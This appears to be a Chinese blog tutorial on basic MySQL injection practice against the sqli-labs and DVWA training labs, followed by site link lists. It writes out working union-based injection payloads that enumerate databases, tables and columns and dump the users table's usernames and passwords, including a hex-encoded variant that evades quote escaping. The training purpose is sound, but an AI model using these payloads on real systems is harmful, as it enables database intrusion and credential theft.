首页
所有分类
TAGS
文字工具 EMOJI BIBLE
数据库 MySQL

MySQL注入基础练习

Posted in MySQL onMay 30, 2021

以sqli-labs-master作为练习

初始:简单获取基础内容

第一步,使用拼接的方式决定注入类型

MySQL注入基础练习

第二部,使用order by确定有表单有几列值

order by根据指定的列对结果集进行排序

MySQL注入基础练习

第三步,使用union select 来找到内容,获取想要得到内容

union select :联合查询

MySQL注入基础练习

进阶,通过mysql注入获取表单内容,托库;

第一步:通过数据库语句进行搜索,首先确定数据库

MySQL注入基础练习

第二部:确定数据库后,爆出它的表;

MySQL注入基础练习

第三步:确定表以后,可根据实际需求爆表,这里以users举例,进行爆字段

MySQL注入基础练习

第四部:确定字段后,我们就可以拖库;

MySQL注入基础练习

DVWA训练基础 low级别

1.参照上文确定当前库

1' union select (select database()),2 -- -

MySQL注入基础练习

2.确定库后,爆表

1' union select (select group_concat(table_name) from information_schema.tables where table_schema = 'dvwa'),2 -- -

MySQL注入基础练习

3.确定表后,爆字段

1' union select (select group_concat(column_name) from information_schema.columns where table_schema = 'dvwa' and table_name='users'),2 -- -

MySQL注入基础练习

4.确定字段后,进行拖库

1' union select (select group_concat(concat_ws(0x7e,user,password))from users),2 -- -

MySQL注入基础练习

级别Medium

与low级别不同,没有输入框,只有选择项,所以需要借助bp工具

MySQL注入基础练习

1.打开代理使用bp进行抓包并发送到Repeater模块进行反复验证

MySQL注入基础练习

2.其余步骤参考上文:暴库

MySQL注入基础练习

爆表

ps:因为后台强制转译的问题,要注意避免单引号

MySQL注入基础练习

爆字段

同爆表,因为转译的问题,要注意避免引号,可使用编译规避;

1 union  select 1,(select group_concat(column_name) from information_schema.columns where table_schema = (select database()) and table_name=0x7573657273)

MySQL注入基础练习

拖库

MySQL注入基础练习

MySQL注入基础练习

- Author -

纪迁辰

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

MySQL 相关文章推荐
MySQL索引篇之千万级数据实战测试
Apr 05 MySQL
MySQL创建索引需要了解的
Apr 08 MySQL
MySQL8.0.24版本Release Note的一些改进点
Apr 22 MySQL
MySQL EXPLAIN输出列的详细解释
May 12 MySQL
MySQL 隔离数据列和前缀索引的使用总结
May 14 MySQL
MySQL如何解决幻读问题
Aug 07 MySQL
MySQL空间数据存储及函数
Sep 25 MySQL
MySQL中的引号和反引号的区别与用法详解
Oct 24 MySQL
navicat 连接Ubuntu虚拟机的mysql的操作方法
Apr 02 MySQL
WINDOWS下安装mysql 8.x 的方法图文教程
Apr 19 MySQL
Mysql中常用的join连接方式
May 11 MySQL
MySQL约束(创建表时的各种条件说明)
Jun 21 MySQL
解决Navicat for MySQL 连接 MySQL 报2005错误的问题
MYSQL(电话号码,身份证)数据脱敏的实现
May 28 #MySQL
MySql开发之自动同步表结构
mysql升级到5.7时,wordpress导数据报错1067的问题
May 27 #MySQL
解决Navicat for Mysql连接报错1251的问题(连接失败)
Navicat for MySQL的使用教程详解
MySQL Router实现MySQL的读写分离的方法
NumPy(2) Scheduled(1) 抽象类(1) 路由(1) 单向链表(1) 扫雷(1) router(1) 双向链表(6) Date(1) 模拟登录(1)
You might like
如何在smarty中增加类似foreach的功能自动加载数据
2013/06/26 PHP
php多进程模拟并发事务产生的问题小结
2018/12/07 PHP
2007/12/23更新创意无限,简单实用(javascript log)
2007/12/24 Javascript
IE中createElement需要注意的一个问题
2010/07/13 Javascript
javascript一个无懈可击的实例化XMLHttpRequest的方法
2010/10/13 Javascript
IE下js调试工具Companion.JS
2010/10/15 Javascript
jQuery EasyUI API 中文文档 - Dialog对话框
2011/11/15 Javascript
javascript实现的弹出层背景置灰-模拟(easyui dialog)
2013/12/27 Javascript
javascript 回到顶部效果的实现代码
2014/02/17 Javascript
NodeJS学习笔记之MongoDB模块
2015/01/13 NodeJs
整理Javascript函数学习笔记
2015/12/01 Javascript
jQuery EasyUI提交表单验证
2016/07/19 Javascript
JavaScript比较当前时间是否在指定时间段内的方法
2016/08/02 Javascript
jQuery中JSONP的两种实现方式详解
2016/09/26 Javascript
jQuery向webApi提交post json数据
2017/01/16 Javascript
详解node nvm进行node多版本管理
2017/10/21 Javascript
重学JS 系列:聊聊继承(推荐)
2019/04/11 Javascript
从零搭一个自用的前端脚手架的方法步骤
2019/09/23 Javascript
[01:10:58]KG vs TNC 2019国际邀请赛小组赛 BO2 第二场 8.15
2019/08/16 DOTA
python发送邮件的实例代码(支持html、图片、附件)
2013/03/04 Python
Python使用函数默认值实现函数静态变量的方法
2014/08/18 Python
python文件写入实例分析
2015/04/08 Python
python中列表和元组的区别
2017/12/18 Python
python实现对csv文件的列的内容读取
2018/07/04 Python
python读取tif图片时保留其16bit的编码格式实例
2020/01/13 Python
python设置代理和添加镜像源的方法
2020/02/14 Python
使用python将微信image下.dat文件解密为.png的方法
2020/11/30 Python
Carter’s官方旗舰店:美国受欢迎的婴童服装品牌
2018/01/21 全球购物
欧舒丹美国官网:L’Occitane美国
2018/02/23 全球购物
汽车维修工岗位职责
2014/02/12 职场文书
投标服务承诺书
2014/05/28 职场文书
机械工程及其自动化专业求职信
2014/08/08 职场文书
大三学生英语考试作弊检讨书
2015/01/01 职场文书
教师节感谢信
2015/01/22 职场文书
深度学习tensorflow基础mnist
2021/04/14 Python
pandas求平均数和中位数的方法实例
2021/08/04 Python